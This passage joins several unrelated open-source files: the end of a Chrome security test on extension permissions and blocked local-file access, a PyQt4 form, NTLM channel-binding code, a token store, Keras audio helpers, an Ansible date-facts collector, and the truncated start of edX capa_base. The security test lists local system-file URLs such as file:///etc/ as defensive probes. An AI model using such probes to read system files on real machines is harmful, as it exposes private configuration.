       'file:///etc/': 'Index of /etc/',
       self.GetFileURLForDataPath('title2.html'): 'Title Of Awesomeness',
    }
    for url, title in urls_and_titles.iteritems():
      self.NavigateToURL(url)
      # If the page's expected title shows up, the local file was served.
      self.assertNotEqual(title, self.GetActiveTabTitle(),
                          msg='Could access local file %s.' % url)

  def _AssertPermissionSetIsExpected(self, expected_set, actual_set, perm_type,
                                     full_expected_info, full_actual_info):
    """Asserts that the set of permissions for an extension is expected.

    Args:
      expected_set: A set of permissions that are expected to be present.
      actual_set: A set of permissions that are actually present.
      perm_type: A string describing the type of permission involved.
      full_expected_info: A dictionary fully describing the expected information
                          associated with the given extension.
      full_actual_info: A dictionary fully describing the actual information
                        associated with the given extension.
    """
    def _GetSetDifferenceMessage(expected_set, actual_set):
      strings = []
      for missing_item in expected_set.difference(actual_set):
        strings.append('Missing item: "%s"' % missing_item)
      for extra_item in actual_set.difference(expected_set):
        strings.append('Unexpected (extra) item: "%s"' % extra_item)
      return '\n'.join(strings)

    self.assertEqual(
        expected_set, actual_set,
        msg=('%s do not match for "%s".\n'
             '%s\n'
             'Expected extension info:\n%s'
             '\nActual extension info:\n%s' %
             (perm_type, full_expected_info['name'],
              _GetSetDifferenceMessage(expected_set, actual_set),
              self.pformat(full_expected_info),
              self.pformat(full_actual_info))))

  def _AssertExtensionNamesAreExpected(self, expected_set, actual_set,
                                       ext_type, full_expected_info,
                                       full_actual_info):
    """Asserts that a set of extensions is expected.

    Args:
      expected_set: A set of extension names that are expected to be present.
      actual_set: A set of extension names that are actually present.
      ext_type: A string describing the type of extensions involved.
      full_expected_info: A list of dictionaries describing the expected
                          information for all extensions.
      full_actual_info: A list of dictionaries describing the actual information
                        for all extensions.
    """
    # Skip the Web Store and Bookmark Manager; they are integral to Chrome and
    # are redundant to check on ChromeOS.  This can reduce the number of times
    # we have to update the baseline for this test.
    for extension_name in ['Chrome Web Store', 'Bookmark Manager']:
      actual_set.discard(extension_name)

    def _GetSetDifferenceMessage(expected_set, actual_set):
      strings = []
      for missing_item in expected_set.difference(actual_set):
        strings.append('Missing item: "%s"' % missing_item)
        located_ext_info = [info for info in full_expected_info if
                            info['name'] == missing_item][0]
        strings.append(self.pformat(located_ext_info))
      for extra_item in actual_set.difference(expected_set):
        strings.append('Unexpected (extra) item: "%s"' % extra_item)
        located_ext_info = [info for info in full_actual_info if
                            info['name'] == extra_item][0]
        strings.append(self.pformat(located_ext_info))
      return '\n'.join(strings)

    self.assertEqual(
        expected_set, actual_set,
        msg='%s names do not match the baseline.\n'
            '%s\n' %
            (ext_type, _GetSetDifferenceMessage(expected_set, actual_set)))

  def _VerifyExtensionPermissions(self, baseline):
    """Ensures extension permissions in the baseline match actual info.

    This function will fail the current test if either (1) an extension named
    in the baseline is not currently installed in Chrome; or (2) the api
    permissions or effective host permissions of an extension in the baseline
    do not match the actual permissions associated with the extension in Chrome.

    Args:
      baseline: A dictionary of expected extension information, containing
                extension names and api/effective host permission info.
    """
    full_ext_actual_info = self.GetExtensionsInfo()
    for ext_expected_info in baseline:
      located_ext_info = [info for info in full_ext_actual_info if
                          info['name'] == ext_expected_info['name']]
      self.assertTrue(
          located_ext_info,
          msg=('Cannot locate extension info for "%s".\n'
               'Expected extension info:\n%s' %
               (ext_expected_info['name'], self.pformat(ext_expected_info))))
      ext_actual_info = located_ext_info[0]
      self._AssertPermissionSetIsExpected(
          set(ext_expected_info['effective_host_permissions']),
          set(ext_actual_info['effective_host_permissions']),
          'Effective host permissions', ext_expected_info, ext_actual_info)
      self._AssertPermissionSetIsExpected(
          set(ext_expected_info['api_permissions']),
          set(ext_actual_info['api_permissions']),
          'API permissions', ext_expected_info, ext_actual_info)

  def testComponentExtensionPermissions(self):
    """Ensures component extension permissions are as expected."""
    expected_names = [ext['name'] for ext in self._component_extension_baseline]
    ext_actual_info = self.GetExtensionsInfo()
    actual_names = [ext['name'] for ext in ext_actual_info if
                    ext['is_component']]
    self._AssertExtensionNamesAreExpected(
        set(expected_names), set(actual_names), 'Component extension',
        self._component_extension_baseline, ext_actual_info)
    self._VerifyExtensionPermissions(self._component_extension_baseline)

  def testBundledCrxPermissions(self):
    """Ensures bundled CRX permissions are as expected."""
    # Verify that each bundled CRX on the device is expected, then install it.
    for file_name in os.listdir(self._bundled_crx_directory):
      if file_name.endswith('.crx'):
        self.assertTrue(
            file_name in [x['crx_file'] for x in self._bundled_crx_baseline],
            msg='Unexpected CRX file: ' + file_name)
        crx_file = os.path.join(self._bundled_crx_directory, file_name)
        self.InstallExtension(crx_file)
    # Verify that the permissions information in the baseline matches the
    # permissions associated with the installed bundled CRX extensions.
    self._VerifyExtensionPermissions(self._bundled_crx_baseline)

  def testNoUnexpectedExtensions(self):
    """Ensures there are no unexpected bundled or component extensions."""
    # Install all bundled extensions on the device.
    for file_name in os.listdir(self._bundled_crx_directory):
      if file_name.endswith('.crx'):
        crx_file = os.path.join(self._bundled_crx_directory, file_name)
        self.InstallExtension(crx_file)
    # Ensure that the set of installed extension names precisely matches the
    # baseline.
    expected_names = [ext['name'] for ext in self._component_extension_baseline]
    expected_names.extend([ext['name'] for ext in self._bundled_crx_baseline])
    ext_actual_info = self.GetExtensionsInfo()
    installed_names = [ext['name'] for ext in ext_actual_info]
    self._AssertExtensionNamesAreExpected(
        set(expected_names), set(installed_names), 'Installed extension',
        self._component_extension_baseline + self._bundled_crx_baseline,
        ext_actual_info)
# Standard pyauto entry point: runs the tests defined in this module.
if __name__ == '__main__':
  pyauto_functional.Main()
| bsd-3-clause |
shrinidhi666/rbhus | rbhusUI/lib/rbhusPipeProjCreateMod.py | 1 | 10841 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'rbhusPipeProjCreateMod.ui'
#
# Created: Tue Aug 18 09:42:16 2015
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# PyQt4 compatibility shims emitted by pyuic4: on builds where QString /
# QApplication.UnicodeUTF8 no longer exist (API v2 / Python 3), fall back
# to identity conversion and the plain translate() signature.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        return s

try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Generated UI layout for the rbhus 'create new project' window.

    NOTE: per the header of this file it was generated by pyuic4 from
    rbhusPipeProjCreateMod.ui — manual edits will be lost on regeneration.
    """

    def setupUi(self, MainWindow):
        """Create all widgets and place them in MainWindow's grid layout."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(420, 335)
        self.centralwidget = QtGui.QWidget(MainWindow)
        self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
        self.gridLayout = QtGui.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
        # Row 8: description label.
        self.labelDesc = QtGui.QLabel(self.centralwidget)
        self.labelDesc.setObjectName(_fromUtf8("labelDesc"))
        self.gridLayout.addWidget(self.labelDesc, 8, 0, 1, 1)
        # Row 10: vertical spacer pushing the lower controls down.
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.gridLayout.addItem(spacerItem, 10, 0, 1, 2)
        self.labelDue = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelDue.sizePolicy().hasHeightForWidth())
        self.labelDue.setSizePolicy(sizePolicy)
        self.labelDue.setObjectName(_fromUtf8("labelDue"))
        self.gridLayout.addWidget(self.labelDue, 4, 0, 1, 1)
        # Row 13: rbhusRender checkbox (always on, not user-editable).
        self.checkRI = QtGui.QCheckBox(self.centralwidget)
        self.checkRI.setEnabled(False)
        self.checkRI.setChecked(True)
        self.checkRI.setObjectName(_fromUtf8("checkRI"))
        self.gridLayout.addWidget(self.checkRI, 13, 0, 1, 3)
        self.labelProj_2 = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelProj_2.sizePolicy().hasHeightForWidth())
        self.labelProj_2.setSizePolicy(sizePolicy)
        self.labelProj_2.setObjectName(_fromUtf8("labelProj_2"))
        self.gridLayout.addWidget(self.labelProj_2, 0, 0, 1, 1)
        self.labelName = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelName.sizePolicy().hasHeightForWidth())
        self.labelName.setSizePolicy(sizePolicy)
        self.labelName.setObjectName(_fromUtf8("labelName"))
        self.gridLayout.addWidget(self.labelName, 1, 0, 1, 1)
        self.labelAclGroup = QtGui.QLabel(self.centralwidget)
        self.labelAclGroup.setObjectName(_fromUtf8("labelAclGroup"))
        self.gridLayout.addWidget(self.labelAclGroup, 7, 0, 1, 1)
        self.labelAdmin = QtGui.QLabel(self.centralwidget)
        self.labelAdmin.setObjectName(_fromUtf8("labelAdmin"))
        self.gridLayout.addWidget(self.labelAdmin, 5, 0, 1, 1)
        self.labelDirectory = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelDirectory.sizePolicy().hasHeightForWidth())
        self.labelDirectory.setSizePolicy(sizePolicy)
        self.labelDirectory.setObjectName(_fromUtf8("labelDirectory"))
        self.gridLayout.addWidget(self.labelDirectory, 2, 0, 1, 1)
        self.labelAclUser = QtGui.QLabel(self.centralwidget)
        self.labelAclUser.setObjectName(_fromUtf8("labelAclUser"))
        self.gridLayout.addWidget(self.labelAclUser, 6, 0, 1, 1)
        self.labelLinked = QtGui.QLabel(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.labelLinked.sizePolicy().hasHeightForWidth())
        self.labelLinked.setSizePolicy(sizePolicy)
        self.labelLinked.setObjectName(_fromUtf8("labelLinked"))
        self.gridLayout.addWidget(self.labelLinked, 9, 0, 1, 1)
        # Row 9: 'linked' line edit plus its 'select' push button.
        self.lineEditLinked = QtGui.QLineEdit(self.centralwidget)
        self.lineEditLinked.setObjectName(_fromUtf8("lineEditLinked"))
        self.gridLayout.addWidget(self.lineEditLinked, 9, 1, 1, 1)
        self.pushLinked = QtGui.QPushButton(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushLinked.sizePolicy().hasHeightForWidth())
        self.pushLinked.setSizePolicy(sizePolicy)
        self.pushLinked.setObjectName(_fromUtf8("pushLinked"))
        self.gridLayout.addWidget(self.pushLinked, 9, 2, 1, 1)
        self.lineEditDesc = QtGui.QLineEdit(self.centralwidget)
        self.lineEditDesc.setText(_fromUtf8(""))
        self.lineEditDesc.setObjectName(_fromUtf8("lineEditDesc"))
        self.gridLayout.addWidget(self.lineEditDesc, 8, 1, 1, 2)
        # ACL group/user edits start disabled; defaults applied in retranslateUi.
        self.lineEditAclGroup = QtGui.QLineEdit(self.centralwidget)
        self.lineEditAclGroup.setEnabled(False)
        self.lineEditAclGroup.setObjectName(_fromUtf8("lineEditAclGroup"))
        self.gridLayout.addWidget(self.lineEditAclGroup, 7, 1, 1, 2)
        self.lineEditAclUser = QtGui.QLineEdit(self.centralwidget)
        self.lineEditAclUser.setEnabled(False)
        self.lineEditAclUser.setObjectName(_fromUtf8("lineEditAclUser"))
        self.gridLayout.addWidget(self.lineEditAclUser, 6, 1, 1, 2)
        self.dateEditDue = QtGui.QDateTimeEdit(self.centralwidget)
        self.dateEditDue.setCalendarPopup(True)
        self.dateEditDue.setObjectName(_fromUtf8("dateEditDue"))
        self.gridLayout.addWidget(self.dateEditDue, 4, 1, 1, 2)
        self.comboDirectory = QtGui.QComboBox(self.centralwidget)
        self.comboDirectory.setObjectName(_fromUtf8("comboDirectory"))
        self.gridLayout.addWidget(self.comboDirectory, 2, 1, 1, 2)
        self.lineEditName = QtGui.QLineEdit(self.centralwidget)
        self.lineEditName.setObjectName(_fromUtf8("lineEditName"))
        self.gridLayout.addWidget(self.lineEditName, 1, 1, 1, 2)
        self.comboProjType = QtGui.QComboBox(self.centralwidget)
        self.comboProjType.setObjectName(_fromUtf8("comboProjType"))
        self.gridLayout.addWidget(self.comboProjType, 0, 1, 1, 2)
        # Row 11: horizontal separator above the 'create' button.
        self.line = QtGui.QFrame(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.line.sizePolicy().hasHeightForWidth())
        self.line.setSizePolicy(sizePolicy)
        self.line.setFrameShape(QtGui.QFrame.HLine)
        self.line.setFrameShadow(QtGui.QFrame.Sunken)
        self.line.setObjectName(_fromUtf8("line"))
        self.gridLayout.addWidget(self.line, 11, 0, 1, 3)
        self.pushCreate = QtGui.QPushButton(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.MinimumExpanding, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushCreate.sizePolicy().hasHeightForWidth())
        self.pushCreate.setSizePolicy(sizePolicy)
        self.pushCreate.setObjectName(_fromUtf8("pushCreate"))
        self.gridLayout.addWidget(self.pushCreate, 14, 0, 1, 3)
        self.lineEditAdmins = QtGui.QLineEdit(self.centralwidget)
        self.lineEditAdmins.setObjectName(_fromUtf8("lineEditAdmins"))
        self.gridLayout.addWidget(self.lineEditAdmins, 5, 1, 1, 1)
        self.pushUsers = QtGui.QPushButton(self.centralwidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.pushUsers.sizePolicy().hasHeightForWidth())
        self.pushUsers.setSizePolicy(sizePolicy)
        self.pushUsers.setObjectName(_fromUtf8("pushUsers"))
        self.gridLayout.addWidget(self.pushUsers, 5, 2, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.statusBar = QtGui.QStatusBar(MainWindow)
        self.statusBar.setObjectName(_fromUtf8("statusBar"))
        MainWindow.setStatusBar(self.statusBar)

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Apply (translated) display strings, tooltips and default texts."""
        MainWindow.setWindowTitle(_translate("MainWindow", "Rbhus Pipe NEW PROJECT", None))
        self.labelDesc.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
        self.labelDesc.setText(_translate("MainWindow", "description", None))
        self.labelDue.setText(_translate("MainWindow", "due date", None))
        self.checkRI.setText(_translate("MainWindow", "rbhusRender intergration", None))
        self.labelProj_2.setText(_translate("MainWindow", "projType", None))
        self.labelName.setText(_translate("MainWindow", "name", None))
        self.labelAclGroup.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
        self.labelAclGroup.setText(_translate("MainWindow", "aclGroup", None))
        self.labelAdmin.setText(_translate("MainWindow", "admins", None))
        self.labelDirectory.setWhatsThis(_translate("MainWindow", "directory to store the output data from file. eg : rendered output of lighting files.", None))
        self.labelDirectory.setText(_translate("MainWindow", "directory", None))
        self.labelAclUser.setToolTip(_translate("MainWindow", "user owner of the project directory", None))
        self.labelAclUser.setText(_translate("MainWindow", "aclUser", None))
        self.labelLinked.setText(_translate("MainWindow", "linked", None))
        self.lineEditLinked.setText(_translate("MainWindow", "default", None))
        self.pushLinked.setText(_translate("MainWindow", "select", None))
        self.lineEditDesc.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
        self.lineEditAclGroup.setToolTip(_translate("MainWindow", "group owner of the project directory", None))
        self.lineEditAclGroup.setText(_translate("MainWindow", "artist", None))
        self.lineEditAclUser.setToolTip(_translate("MainWindow", "user owner of the project directory", None))
        self.lineEditAclUser.setText(_translate("MainWindow", "kryptos", None))
        self.pushCreate.setText(_translate("MainWindow", "create", None))
        self.lineEditAdmins.setToolTip(_translate("MainWindow", "list of comma separated usernames", None))
        self.pushUsers.setText(_translate("MainWindow", "select", None))
| gpl-3.0 |
jborean93/ntlm-auth | ntlm_auth/gss_channel_bindings.py | 1 | 2499 | # Copyright: (c) 2018, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
import struct
class GssChannelBindingsStruct(object):
    """GSS channel-bindings structure used for out-of-band channel info.

    In most cases the CBT is the hash of the server's TLS certificate,
    stored in the application_data field. The packed byte string produced
    by get_data() is then MD5 hashed and included in the NTv2 response.
    """

    INITIATOR_ADDTYPE = 'initiator_addtype'
    INITIATOR_ADDRESS_LENGTH = 'initiator_address_length'
    ACCEPTOR_ADDRTYPE = 'acceptor_addrtype'
    ACCEPTOR_ADDRESS_LENGTH = 'acceptor_address_length'
    APPLICATION_DATA_LENGTH = 'application_data_length'
    INITIATOR_ADDRESS = 'initiator_address'
    ACCEPTOR_ADDRESS = 'acceptor_address'
    APPLICATION_DATA = 'application_data'

    def __init__(self):
        """Initialise every numeric field to 0 and every buffer to b''."""
        self.fields = {
            self.INITIATOR_ADDRESS: b"",
            self.ACCEPTOR_ADDRESS: b"",
            self.APPLICATION_DATA: b"",
            self.INITIATOR_ADDTYPE: 0,
            self.INITIATOR_ADDRESS_LENGTH: 0,
            self.ACCEPTOR_ADDRTYPE: 0,
            self.ACCEPTOR_ADDRESS_LENGTH: 0,
            self.APPLICATION_DATA_LENGTH: 0,
        }

    def __setitem__(self, key, value):
        self.fields[key] = value

    def __getitem__(self, key):
        return self.fields[key]

    def get_data(self):
        """Pack the structure into its little-endian wire format."""
        # Refresh the three length fields from the current buffer contents.
        self[self.INITIATOR_ADDRESS_LENGTH] = len(self[self.INITIATOR_ADDRESS])
        self[self.ACCEPTOR_ADDRESS_LENGTH] = len(self[self.ACCEPTOR_ADDRESS])
        self[self.APPLICATION_DATA_LENGTH] = len(self[self.APPLICATION_DATA])

        # Concatenate the fields in wire order: each uint32 is little-endian,
        # each variable-length buffer immediately follows its length.
        pieces = [
            struct.pack("<L", self[self.INITIATOR_ADDTYPE]),
            struct.pack("<L", self[self.INITIATOR_ADDRESS_LENGTH]),
            self[self.INITIATOR_ADDRESS],
            struct.pack("<L", self[self.ACCEPTOR_ADDRTYPE]),
            struct.pack("<L", self[self.ACCEPTOR_ADDRESS_LENGTH]),
            self[self.ACCEPTOR_ADDRESS],
            struct.pack("<L", self[self.APPLICATION_DATA_LENGTH]),
            self[self.APPLICATION_DATA],
        ]
        return b"".join(pieces)
| mit |
sudheesh001/oh-mainline | vendor/packages/gdata/src/atom/token_store.py | 280 | 4048 | #!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides a TokenStore class which is designed to manage
auth tokens required for different services.
Each token is valid for a set of scopes which is the start of a URL. An HTTP
client will use a token store to find a valid Authorization header to send
in requests to the specified URL. If the HTTP client determines that a token
has expired or been revoked, it can remove the token from the store so that
it will not be used in future requests.
"""
__author__ = 'api.jscudder (Jeff Scudder)'
import atom.http_interface
import atom.url
# Catch-all scope prefix: every http(s) URL string begins with 'http'.
SCOPE_ALL = 'http'
class TokenStore(object):
    """Manages Authorization tokens which will be sent in HTTP headers."""

    def __init__(self, scoped_tokens=None):
        # Maps str(scope) -> token object.
        self._tokens = scoped_tokens or {}

    def add_token(self, token):
        """Adds a new token to the store (replaces tokens with the same scope).

        Args:
          token: A subclass of http_interface.GenericToken. The token object
              adds the Authorization header to HTTP requests; its scopes
              determine whether it is valid for a URL in find_token.

        Returns:
          True if the token was added, False if it had no scopes.
        """
        scopes = getattr(token, 'scopes', None)
        if not scopes:
            return False
        for scope in scopes:
            self._tokens[str(scope)] = token
        return True

    def find_token(self, url):
        """Selects an Authorization header token which can be used for the URL.

        Args:
          url: str or atom.url.Url. The URL about to be requested; the first
              stored token whose scope covers it is returned.

        Returns:
          A token valid for the url, or atom.http_interface.GenericToken()
          (which adds no Authorization header) when none matches.
        """
        if url is None:
            return None
        if isinstance(url, (str, unicode)):
            url = atom.url.parse_url(url)
        # Fast path: a token stored under exactly this scope.
        if url in self._tokens:
            exact = self._tokens[url]
            if exact.valid_for_scope(url):
                return exact
            # Stale entry: drop it so it is not consulted again.
            del self._tokens[url]
        for _scope, candidate in self._tokens.iteritems():
            if candidate.valid_for_scope(url):
                return candidate
        return atom.http_interface.GenericToken()

    def remove_token(self, token):
        """Removes the token from the token_store.

        Used when a token is determined to be invalid (e.g. after a 401/403)
        so that it will not be chosen for future requests.

        Returns:
          True if the token was found and removed, False otherwise.
        """
        stale_scopes = [scope for scope, stored
                        in self._tokens.iteritems() if stored == token]
        for scope in stale_scopes:
            del self._tokens[scope]
        return len(stale_scopes) > 0

    def remove_all_tokens(self):
        self._tokens = {}
| agpl-3.0 |
dolaameng/keras | keras/applications/audio_conv_utils.py | 3 | 2767 | import numpy as np
from .. import backend as K
# Output vocabulary of the music tagger: index i of a prediction row
# corresponds to TAGS[i] (see decode_predictions, which zips rows with TAGS
# and asserts exactly 50 outputs).
TAGS = ['rock', 'pop', 'alternative', 'indie', 'electronic',
        'female vocalists', 'dance', '00s', 'alternative rock', 'jazz',
        'beautiful', 'metal', 'chillout', 'male vocalists',
        'classic rock', 'soul', 'indie rock', 'Mellow', 'electronica',
        '80s', 'folk', '90s', 'chill', 'instrumental', 'punk',
        'oldies', 'blues', 'hard rock', 'ambient', 'acoustic',
        'experimental', 'female vocalist', 'guitar', 'Hip-Hop',
        '70s', 'party', 'country', 'easy listening',
        'sexy', 'catchy', 'funk', 'electro', 'heavy metal',
        'Progressive rock', '60s', 'rnb', 'indie pop',
        'sad', 'House', 'happy']
def librosa_exists():
    """Return True when the optional `librosa` package is importable."""
    try:
        __import__('librosa')
        return True
    except ImportError:
        return False
def preprocess_input(audio_path, dim_ordering='default'):
    '''Reads an audio file and outputs a Mel-spectrogram.

    # Arguments
        audio_path: path of the audio file to load (anything librosa.load
            accepts).
        dim_ordering: 'th' (channels first), 'tf' (channels last), or
            'default' to use the backend's current image dim ordering.

    # Returns
        3D numpy array: log-scaled mel-spectrogram with a singleton channel
        axis prepended ('th') or appended ('tf').

    # Raises
        RuntimeError: if librosa is not installed.
    '''
    if dim_ordering == 'default':
        dim_ordering = K.image_dim_ordering()
    assert dim_ordering in {'tf', 'th'}

    if librosa_exists():
        import librosa
    else:
        raise RuntimeError('Librosa is required to process audio files.\n' +
                           'Install it via `pip install librosa` \nor visit ' +
                           'http://librosa.github.io/librosa/ for details.')

    # mel-spectrogram parameters
    SR = 12000
    N_FFT = 512
    N_MELS = 96
    HOP_LEN = 256
    DURA = 29.12  # duration in seconds; yields a fixed spectrogram width

    src, sr = librosa.load(audio_path, sr=SR)
    n_sample = src.shape[0]
    n_sample_wanted = int(DURA * SR)

    # trim the signal at the center
    if n_sample < n_sample_wanted:  # if too short: zero-pad at the end
        src = np.hstack((src, np.zeros((int(DURA * SR) - n_sample,))))
    elif n_sample > n_sample_wanted:  # if too long: keep the center window
        # BUGFIX: use floor division — under Python 3 `/` yields floats,
        # and float slice indices raise TypeError.
        src = src[(n_sample - n_sample_wanted) // 2:
                  (n_sample + n_sample_wanted) // 2]

    logam = librosa.logamplitude
    melgram = librosa.feature.melspectrogram
    x = logam(melgram(y=src, sr=SR, hop_length=HOP_LEN,
                      n_fft=N_FFT, n_mels=N_MELS) ** 2,
              ref_power=1.0)

    if dim_ordering == 'th':
        x = np.expand_dims(x, axis=0)
    elif dim_ordering == 'tf':
        # BUGFIX: axis=3 is out of bounds for the 2D spectrogram and only
        # worked via legacy numpy behavior that appended the axis; axis=-1
        # appends the channel axis explicitly on all numpy versions.
        x = np.expand_dims(x, axis=-1)
    return x
def decode_predictions(preds, top_n=5):
    '''Decode the output of a music tagger model.

    # Arguments
        preds: 2-dimensional numpy array of shape (samples, 50)
        top_n: integer in [0, 50], number of items to show per sample
    '''
    assert len(preds.shape) == 2 and preds.shape[1] == 50
    results = []
    for row in preds:
        ranked = sorted(zip(TAGS, row),
                        key=lambda pair: pair[1], reverse=True)
        results.append(ranked[:top_n])
    return results
| mit |
drmrd/ansible | lib/ansible/module_utils/facts/system/date_time.py | 197 | 2597 | # Data and time related facts collection for ansible.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import datetime
import time
from ansible.module_utils.facts.collector import BaseFactCollector
class DateTimeFactCollector(BaseFactCollector):
    """Collect wall-clock date/time facts under the 'date_time' key."""
    name = 'date_time'
    _fact_ids = set()

    def collect(self, module=None, collected_facts=None):
        """Build and return {'date_time': {...}} from the current local time."""
        date_time_facts = {}
        now = datetime.datetime.now()

        # Fields that are plain strftime renderings of the single local
        # timestamp captured above.
        strftime_fields = (
            ('year', '%Y'), ('month', '%m'), ('weekday', '%A'),
            ('weekday_number', '%w'), ('weeknumber', '%W'), ('day', '%d'),
            ('hour', '%H'), ('minute', '%M'), ('second', '%S'),
            ('epoch', '%s'), ('date', '%Y-%m-%d'), ('time', '%H:%M:%S'),
            ('iso8601_basic', '%Y%m%dT%H%M%S%f'),
            ('iso8601_basic_short', '%Y%m%dT%H%M%S'),
        )
        for fact_name, fmt in strftime_fields:
            date_time_facts[fact_name] = now.strftime(fmt)

        # '%s' is not supported everywhere; when strftime passes it through
        # (or yields nothing), fall back to time.time().
        # NOTE: in that case the epoch is sampled a few ms after `now`.
        epoch = date_time_facts['epoch']
        if epoch == '' or epoch[0] == '%':
            date_time_facts['epoch'] = str(int(time.time()))

        # UTC renderings. utcnow() is a classmethod, so the `now.` receiver
        # is incidental — each call samples the clock again.
        date_time_facts['iso8601_micro'] = now.utcnow().strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        date_time_facts['iso8601'] = now.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")

        date_time_facts['tz'] = time.strftime("%Z")
        date_time_facts['tz_offset'] = time.strftime("%z")

        return {'date_time': date_time_facts}
| gpl-3.0 |
fly19890211/edx-platform | common/lib/xmodule/xmodule/capa_base.py | 10 | 62110 | """Implements basics of Capa, including class CapaModule."""
import cgi
import copy
import datetime
import hashlib
import json
import logging
import os
import traceback
import struct
import sys
import re
# We don't want to force a dependency on datadog, so make the import conditional
try:
import dogstats_wrapper as dog_stats_api
except ImportError:
# pylint: disable=invalid-name
dog_stats_api = None
from capa.capa_problem import LoncapaProblem, LoncapaSystem
from capa.responsetypes import StudentInputError, \
ResponseError, LoncapaProblemError
from capa.util import convert_files_to_filenames, get_inner_html_from_xpath
from .progress import Progress
from xmodule.exceptions import NotFoundError
from xblock.fields import Scope, String, Boolean, Dict, Integer, Float
from .fields import Timedelta, Date
from django.utils.timezone import UTC
from xmodule.capa_base_constants import RANDOMIZATION, SHOWANSWER
from django.conf import settings
log = logging.getLogger("edx.courseware")

# Make '_' a no-op so we can scrape strings
# (real translation happens at render time via the runtime's i18n service).
_ = lambda text: text

# Generate this many different variants of problems with rerandomize=per_student
NUM_RANDOMIZATION_BINS = 20
# Never produce more than this many different seeds, no matter what.
MAX_RANDOMIZATION_BINS = 1000
def randomization_bin(seed, problem_id):
    """
    Pick a randomization bin for the problem given the user's seed and a problem id.

    Only a limited number of variants per problem are wanted (to keep
    analytics interesting); mixing the problem id into the hash avoids sets
    of students that always share the same variants across problems.
    """
    hasher = hashlib.sha1()
    for part in (seed, problem_id):
        hasher.update(str(part))
    # First 7 hex digits of the digest -> int, folded into the bin count.
    return int(hasher.hexdigest()[:7], 16) % NUM_RANDOMIZATION_BINS
class Randomization(String):
    """
    Field storing when/how a problem is randomized (RANDOMIZATION constants).
    """
    def from_json(self, value):
